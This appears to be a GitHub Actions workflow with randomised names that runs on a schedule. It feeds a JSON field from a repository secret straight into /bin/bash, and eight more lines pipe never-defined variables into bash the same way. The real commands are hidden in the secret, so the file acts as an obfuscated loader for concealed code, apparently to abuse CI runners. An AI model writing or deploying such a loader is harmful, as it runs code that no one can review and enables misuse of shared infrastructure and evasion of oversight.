name: luantanwanyu
on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luantanwanyu
        env:
          e7734: ${{ secrets.e7734 }}
        run: |
          echo $e7734 | jq -r .kxirf95831 | /bin/bash
          echo $i55 | jq -r .jlp91080 | /bin/bash
          echo $fbc28 | jq -r .n65 | /bin/bash
          echo $uc2733 | jq -r .xga8033 | /bin/bash
          echo $evlr4 | jq -r .gdpzo5735 | /bin/bash
          echo $tiruc99676 | jq -r .vmftw27 | /bin/bash
          echo $kgie830 | jq -r .oxioa423 | /bin/bash
          echo $foavd4 | jq -r .ly9119 | /bin/bash
          echo $sgcz21335 | jq -r .aj3 | /bin/bash

